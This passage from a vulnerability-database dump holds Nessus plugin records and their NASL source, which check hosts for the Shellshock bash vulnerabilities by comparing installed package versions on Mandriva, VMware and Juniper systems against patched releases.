introduced\nby the latest patch, caused by adding prefixes and suffixes to the\nvariable names used for exporting functions. Note that the RedHat\narticle mentions these variable names will have parentheses '()' at\nthe end of their names, however, the latest upstream patch uses two\npercent signs '%%' at the end instead.\n\nTwo other unrelated security issues in the parser have also been fixed\nin this update (CVE-2014-7186, CVE-2014-7187).\n\nAll users and sysadmins are advised to update their bash package\nimmediately.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0388.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0393.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"bash-4.2-53.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"bash-doc-4.2-53.1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T18:59:32", "description": "The version of VMware vCenter Operations Manager installed on the remote host is prior to 5.7.3 / 5.8.3. It is, therefore, affected by the environmental variable command injection vulnerability known as 'Shellshock'.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-06T00:00:00", "type": "nessus", "title": "VMware vCenter Operations Management Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_operations"], "id": "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78889);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vCenter Operations Management Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Operations Manager installed on the\nremote host is prior to 5.7.3 / 5.8.3. It is, therefore, affected by\nthe environmental variable command injection vulnerability known as\n'Shellshock'.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000272.html\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2091083\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5e08f66\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2091002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d4f0ad92\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor supplied patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_operations\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"suse_11_bash-140926.nasl\");\n script_require_keys(\"Host/VMware vCenter Operations Manager/Version\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/local_checks_enabled\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\n# Check if general SuSE check already ran\nif (get_kb_item(\"Success/77958\")) exit(0, \"Plugin #77958 already found that bash needs to be updated.\");\n\napp = \"VMware vCenter Operations Manager\";\nvuln = FALSE;\n\n# local checks are required\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\n# Check that the host is SUSE\nos = get_kb_item_or_exit(\"Host/SuSE/release\");\nif (os !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE\");\n\n# rpm list is required\nget_kb_item_or_exit(\"Host/SuSE/rpm-list\");\n\n# Make sure this is an affected version of vCOPs\n# According to the advisory, vCOPS 5.x is vulnerable\n# Software downloads and patches are only available\n# for 5.7 and 5.8. We're checking for those specifically\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Operations Manager/Version\");\nif (version !~ \"^5\\.[78]\\.\") audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\n# Perform RPM checks\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-32bit-5.2-147.22.1\")) vuln = TRUE;\n\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\\n' + 'The remote ' + app + ' appliance has one or more outdated packages :' +\n '\\n';\n security_hole(port:0, extra:report+rpm_report_get());\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected because the packages are up-to-date\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T19:01:33", "description": "The version of VMware Workspace Portal (formerly known as VMware Horizon Workspace) installed on the remote host is missing package updates. It is, therefore, affected by the following vulnerabilities in the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. By sending a specially crafted request to a CGI script that passes environment variables, a remote, unauthenticated attacker can execute arbitrary code on the host. (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169)\n\n - An out-of-bounds memory access error exists due to improper redirection implementation in the 'parse.y' source file. A remote attacker can exploit this issue to cause a denial of service or potentially execute arbitrary code. (CVE-2014-7186)\n\n - An off-by-one error exists in the 'read_token_word' function in the 'parse.y' source file. A remote attacker can exploit this issue to cause a denial of service or potentially execute arbitrary code. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2014-11-04T00:00:00", "type": "nessus", "title": "VMware Workspace Portal Multiple Bash Shell Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["x-cpe:/a:vmware:vmware_horizon_workspace", "x-cpe:/a:vmware:vmware_workspace_portal"], "id": "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78857);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware Workspace Portal Multiple Bash Shell Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a device management application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workspace Portal (formerly known as VMware\nHorizon Workspace) installed on the remote host is missing package\nupdates. It is, therefore, affected by the following vulnerabilities\nin the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock, which is due to the processing of\n trailing strings after function definitions in the\n values of environment variables. This allows a remote\n attacker to execute arbitrary code via environment\n variable manipulation depending on the configuration of\n the system. By sending a specially crafted request to a\n CGI script that passes environment variables, a remote,\n unauthenticated attacker can execute arbitrary code on\n the host. (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278,\n CVE-2014-7169)\n\n - An out-of-bounds memory access error exists due to\n improper redirection implementation in the 'parse.y'\n source file. A remote attacker can exploit this issue\n to cause a denial of service or potentially execute\n arbitrary code. (CVE-2014-7186)\n\n - An off-by-one error exists in the 'read_token_word'\n function in the 'parse.y' source file. A remote attacker\n can exploit this issue to cause a denial of service or\n potentially execute arbitrary code. (CVE-2014-7187)\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2091067\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52af41d9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch as stated in the 2091067 VMware KB advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vmware_horizon_workspace\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vmware_workspace_portal\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"suse_11_bash-140926.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n script_require_ports(\"Host/VMware Horizon Workspace/Version\", \"Host/VMware Workspace Portal/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\n# Check if general SuSE check already ran\nif (get_kb_item(\"Success/77958\")) exit(0, \"Plugin #77958 already found that bash needs to be updated.\");\n\n# Check that the OS is SuSE\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\napp = NULL;\nversion = NULL;\n\nversion = get_kb_item(\"Host/VMware Horizon Workspace/Version\");\nif (!isnull(version))\n{\n app = \"VMware Horizon Workspace\";\n}\nelse\n{\n version = get_kb_item(\"Host/VMware Workspace Portal/Version\");\n app = \"VMware Workspace Portal\";\n}\n\nif (isnull(version)) audit(AUDIT_NOT_INST, \"VMware Horizon Workspace / VMware Workspace Portal\");\n\n# VMware Horizon Workspace affected versions:\n# 1.5.0 - 1.5.2\n# 1.8.0 - 1.8.2\nif (app == \"VMware Horizon Workspace\" && version !~ \"^1\\.[58]\\.[0-2]$\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n# VMware Workspace Portal affected versions:\n# 2.0.0 and 2.1.0\nelse if (app == \"VMware Workspace Portal\" && version !~ \"^2\\.[01]\\.0$\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\nvuln = FALSE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-32bit-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) vuln = TRUE;\n\nif (!vuln) audit(AUDIT_HOST_NOT, \"affected because the packages are up-to-date\");\n\n\nif (report_verbosity > 0)\n{\n report = '\\n' + 'The remote ' + app + ' appliance has one or more outdated packages :' +\n '\\n' +\n rpm_report_get();\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T19:03:15", "description": "According to its self-reported version number, the remote Junos Space version is prior to 14.1R2, and may be affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-12-22T00:00:00", "type": "nessus", "title": "Juniper Junos Space GNU Bash Command Injection Vulnerability (JSA10648) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA10648.NASL", "href": "https://www.tenable.com/plugins/nessus/80196", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80196);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Juniper Junos Space GNU Bash Command Injection Vulnerability (JSA10648) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Junos Space\nversion is prior to 14.1R2, and may be affected by a command injection\nvulnerability in GNU Bash known as Shellshock. The vulnerability is\ndue to the processing of trailing strings after function definitions\nin the values of environment variables. This allows a remote attacker\nto execute arbitrary code via environment variable manipulation\ndepending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Junos Space 14.1R2 or later or apply the relevant patch\nreferenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_fami